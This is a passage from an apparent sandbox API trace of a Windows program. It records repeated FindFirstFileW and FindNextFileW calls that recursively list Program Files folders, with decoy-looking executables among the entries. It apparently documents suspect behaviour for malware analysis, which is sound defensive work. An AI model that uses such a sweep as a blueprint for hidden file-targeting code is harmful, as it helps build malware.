ftLastAccessTime.dwLowDateTime=0x6a3248d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6a3248d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="v1.0", cAlternateFileName="")) returned 0 [0058.285] FindClose (in: hFindFile=0x6978f0 | out: hFindFile=0x6978f0) returned 1 [0058.285] FindNextFileW (in: hFindFile=0x69b288, lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61a36a60, ftCreationTime.dwHighDateTime=0x1d5b39b, ftLastAccessTime.dwLowDateTime=0xe58cc010, ftLastAccessTime.dwHighDateTime=0x1d5be77, ftLastWriteTime.dwLowDateTime=0xe58cc010, ftLastWriteTime.dwHighDateTime=0x1d5be77, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="aldelo.exe", cAlternateFileName="")) returned 1 [0058.285] FindNextFileW (in: hFindFile=0x69b288, lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61a36a60, ftCreationTime.dwHighDateTime=0x1d5b39b, ftLastAccessTime.dwLowDateTime=0xe58cc010, ftLastAccessTime.dwHighDateTime=0x1d5be77, ftLastWriteTime.dwLowDateTime=0xe58cc010, ftLastWriteTime.dwHighDateTime=0x1d5be77, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="aldelo.exe", cAlternateFileName="")) returned 0 [0058.285] FindClose (in: hFindFile=0x69b288 | out: hFindFile=0x69b288) returned 1 [0058.285] FindNextFileW (in: hFindFile=0x6946c8, lpFindFileData=0x18f604 | out: lpFindFileData=0x18f604*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xdd66d4c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdd66d4c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSBuild", cAlternateFileName="")) returned 1 [0058.285] FindFirstFileW (in: lpFileName="C:\\Program Files\\MSBuild\\*.*", lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xdd66d4c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdd66d4c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69b288 [0058.286] FindNextFileW (in: hFindFile=0x69b288, lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xdd66d4c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdd66d4c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.286] FindNextFileW (in: hFindFile=0x69b288, lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xff3ba620, ftCreationTime.dwHighDateTime=0x1d59488, ftLastAccessTime.dwLowDateTime=0x503fbd70, ftLastAccessTime.dwHighDateTime=0x1d5b3fd, ftLastWriteTime.dwLowDateTime=0x503fbd70, ftLastWriteTime.dwHighDateTime=0x1d5b3fd, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="absolutetelnet.exe", cAlternateFileName="ABSOLU~1.EXE")) returned 1 [0058.286] FindNextFileW (in: hFindFile=0x69b288, lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3192db60, ftCreationTime.dwHighDateTime=0x1d56410, ftLastAccessTime.dwLowDateTime=0xeadeb250, ftLastAccessTime.dwHighDateTime=0x1d5dca7, ftLastWriteTime.dwLowDateTime=0xeadeb250, ftLastWriteTime.dwHighDateTime=0x1d5dca7, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="executed_florists.exe", cAlternateFileName="EXECUT~1.EXE")) returned 1 [0058.286] FindNextFileW (in: hFindFile=0x69b288, lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80020c30, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80020c30, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0058.286] FindFirstFileW (in: lpFileName="C:\\Program Files\\MSBuild\\Microsoft\\*.*", lpFindFileData=0x18f024 | out: lpFindFileData=0x18f024*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80020c30, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80020c30, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6978f0 [0058.287] FindNextFileW (in: hFindFile=0x6978f0, lpFindFileData=0x18f024 | out: lpFindFileData=0x18f024*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80020c30, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80020c30, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.287] FindNextFileW (in: hFindFile=0x6978f0, lpFindFileData=0x18f024 | out: lpFindFileData=0x18f024*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80020c30, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80020c30, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Workflow Foundation", cAlternateFileName="WINDOW~1")) returned 1 [0058.287] FindFirstFileW (in: lpFileName="C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\*.*", lpFindFileData=0x18ed34 | out: lpFindFileData=0x18ed34*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80020c30, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80020c30, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x697930 [0058.287] FindNextFileW (in: hFindFile=0x697930, lpFindFileData=0x18ed34 | out: lpFindFileData=0x18ed34*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80020c30, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80020c30, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.287] FindNextFileW (in: hFindFile=0x697930, lpFindFileData=0x18ed34 | out: lpFindFileData=0x18ed34*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8038cbd7, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8038cbd7, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="v3.0", cAlternateFileName="")) returned 1 [0058.287] FindFirstFileW (in: lpFileName="C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\*.*", lpFindFileData=0x18ea44 | out: lpFindFileData=0x18ea44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8038cbd7, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8038cbd7, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69a9c0 [0058.288] FindNextFileW (in: hFindFile=0x69a9c0, lpFindFileData=0x18ea44 | out: lpFindFileData=0x18ea44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8038cbd7, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8038cbd7, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.288] FindNextFileW (in: hFindFile=0x69a9c0, lpFindFileData=0x18ea44 | out: lpFindFileData=0x18ea44*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8038cbd7, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7bef7178, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7bef7178, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x1276, dwReserved0=0x0, dwReserved1=0x0, cFileName="Workflow.Targets", cAlternateFileName="WORKFL~1.TAR")) returned 1 [0058.288] FindNextFileW (in: hFindFile=0x69a9c0, lpFindFileData=0x18ea44 | out: lpFindFileData=0x18ea44*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8038cbd7, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7bef7178, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7bef7178, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x143e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Workflow.VisualBasic.Targets", cAlternateFileName="WORKFL~2.TAR")) returned 1 [0058.288] FindNextFileW (in: hFindFile=0x69a9c0, lpFindFileData=0x18ea44 | out: lpFindFileData=0x18ea44*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8038cbd7, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7bef7178, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7bef7178, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x143e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Workflow.VisualBasic.Targets", cAlternateFileName="WORKFL~2.TAR")) returned 0 [0058.288] FindClose (in: hFindFile=0x69a9c0 | out: hFindFile=0x69a9c0) returned 1 [0058.288] FindNextFileW (in: hFindFile=0x697930, lpFindFileData=0x18ed34 | out: lpFindFileData=0x18ed34*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8038cbd7, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8038cbd7, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="v3.5", cAlternateFileName="")) returned 1 [0058.288] FindFirstFileW (in: lpFileName="C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\*.*", lpFindFileData=0x18ea44 | out: lpFindFileData=0x18ea44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8038cbd7, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8038cbd7, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69a9c0 [0058.288] FindNextFileW (in: hFindFile=0x69a9c0, lpFindFileData=0x18ea44 | out: lpFindFileData=0x18ea44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8038cbd7, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8038cbd7, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.289] FindNextFileW (in: hFindFile=0x69a9c0, lpFindFileData=0x18ea44 | out: lpFindFileData=0x18ea44*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56230575, ftCreationTime.dwHighDateTime=0x1c9ea0a, ftLastAccessTime.dwLowDateTime=0x56230575, ftLastAccessTime.dwHighDateTime=0x1c9ea0a, ftLastWriteTime.dwLowDateTime=0x562566d3, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x1c01, dwReserved0=0x0, dwReserved1=0x0, cFileName="Workflow.Targets", cAlternateFileName="")) returned 1 [0058.289] FindNextFileW (in: hFindFile=0x69a9c0, lpFindFileData=0x18ea44 | out: lpFindFileData=0x18ea44*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c9fc12, ftCreationTime.dwHighDateTime=0x1ca03fc, ftLastAccessTime.dwLowDateTime=0x8c9fc12, ftLastAccessTime.dwHighDateTime=0x1ca03fc, ftLastWriteTime.dwLowDateTime=0x5627c831, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x21e8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Workflow.VisualBasic.Targets", cAlternateFileName="")) returned 1 [0058.289] FindNextFileW (in: hFindFile=0x69a9c0, lpFindFileData=0x18ea44 | out: lpFindFileData=0x18ea44*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c9fc12, ftCreationTime.dwHighDateTime=0x1ca03fc, ftLastAccessTime.dwLowDateTime=0x8c9fc12, ftLastAccessTime.dwHighDateTime=0x1ca03fc, ftLastWriteTime.dwLowDateTime=0x5627c831, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x21e8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Workflow.VisualBasic.Targets", cAlternateFileName="")) returned 0 [0058.289] FindClose (in: hFindFile=0x69a9c0 | out: hFindFile=0x69a9c0) returned 1 [0058.289] FindNextFileW (in: hFindFile=0x697930, lpFindFileData=0x18ed34 | out: lpFindFileData=0x18ed34*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8038cbd7, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8038cbd7, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="v3.5", cAlternateFileName="")) returned 0 [0058.289] FindClose (in: hFindFile=0x697930 | out: hFindFile=0x697930) returned 1 [0058.289] FindNextFileW (in: hFindFile=0x6978f0, lpFindFileData=0x18f024 | out: lpFindFileData=0x18f024*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80020c30, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80020c30, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Workflow Foundation", cAlternateFileName="WINDOW~1")) returned 0 [0058.289] FindClose (in: hFindFile=0x6978f0 | out: hFindFile=0x6978f0) returned 1 [0058.289] FindNextFileW (in: hFindFile=0x69b288, lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80020c30, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80020c30, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 0 [0058.290] FindClose (in: hFindFile=0x69b288 | out: hFindFile=0x69b288) returned 1 [0058.290] FindNextFileW (in: hFindFile=0x6946c8, lpFindFileData=0x18f604 | out: lpFindFileData=0x18f604*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80020c30, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80020c30, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reference Assemblies", cAlternateFileName="REFERE~1")) returned 1 [0058.290] FindNextFileW (in: hFindFile=0x6946c8, lpFindFileData=0x18f604 | out: lpFindFileData=0x18f604*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x4232b3dd, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x4232b3dd, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x4232b3dd, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Uninstall Information", cAlternateFileName="UNINST~1")) returned 1 [0058.290] FindFirstFileW (in: lpFileName="C:\\Program Files\\Uninstall Information\\*.*", lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x4232b3dd, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x4232b3dd, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x4232b3dd, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69b288 [0058.290] FindNextFileW (in: hFindFile=0x69b288, lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x4232b3dd, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x4232b3dd, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x4232b3dd, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.290] FindNextFileW (in: hFindFile=0x69b288, lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x4232b3dd, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x4232b3dd, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x4232b3dd, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0058.290] FindClose (in: hFindFile=0x69b288 | out: hFindFile=0x69b288) returned 1 [0058.290] FindNextFileW (in: hFindFile=0x6946c8, lpFindFileData=0x18f604 | out: lpFindFileData=0x18f604*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xe0d9f2e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe0d9f2e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Defender", cAlternateFileName="WINDOW~3")) returned 1 [0058.290] FindNextFileW (in: hFindFile=0x6946c8, lpFindFileData=0x18f604 | out: lpFindFileData=0x18f604*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e177d26, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xdae682e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdae682e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Journal", cAlternateFileName="WI0FCF~1")) returned 1 [0058.291] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Journal\\*.*", lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e177d26, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xdae682e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdae682e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69b288 [0058.291] FindNextFileW (in: hFindFile=0x69b288, lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e177d26, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xdae682e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdae682e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.291] FindNextFileW (in: hFindFile=0x69b288, lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb11ba90, ftCreationTime.dwHighDateTime=0x1d5b797, ftLastAccessTime.dwLowDateTime=0x8f5271f0, ftLastAccessTime.dwHighDateTime=0x1d576b9, ftLastWriteTime.dwLowDateTime=0x8f5271f0, ftLastWriteTime.dwHighDateTime=0x1d576b9, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="component.exe", cAlternateFileName="COMPON~1.EXE")) returned 1 [0058.291] FindNextFileW (in: hFindFile=0x69b288, lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e4268f4, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa35bb41, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e472dd2, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0058.291] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Journal\\en-US\\*.*", lpFindFileData=0x18f024 | out: lpFindFileData=0x18f024*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e4268f4, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa35bb41, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e472dd2, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6978f0 [0058.293] FindNextFileW (in: hFindFile=0x6978f0, lpFindFileData=0x18f024 | out: lpFindFileData=0x18f024*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e4268f4, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa35bb41, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e472dd2, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.293] FindNextFileW (in: hFindFile=0x6978f0, lpFindFileData=0x18f024 | out: lpFindFileData=0x18f024*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x800, dwReserved0=0x0, dwReserved1=0x0, cFileName="JNTFiltr.dll.mui", cAlternateFileName="")) returned 1 [0058.293] FindNextFileW (in: hFindFile=0x6978f0, lpFindFileData=0x18f024 | out: lpFindFileData=0x18f024*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1600, dwReserved0=0x0, dwReserved1=0x0, cFileName="jnwdui.dll.mui", cAlternateFileName="")) returned 1 [0058.293] FindNextFileW (in: hFindFile=0x6978f0, lpFindFileData=0x18f024 | out: lpFindFileData=0x18f024*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="jnwmon.dll.mui", cAlternateFileName="")) returned 1 [0058.294] FindNextFileW (in: hFindFile=0x6978f0, lpFindFileData=0x18f024 | out: lpFindFileData=0x18f024*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x15000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Journal.exe.mui", cAlternateFileName="")) returned 1 [0058.294] FindNextFileW (in: hFindFile=0x6978f0, lpFindFileData=0x18f024 | out: 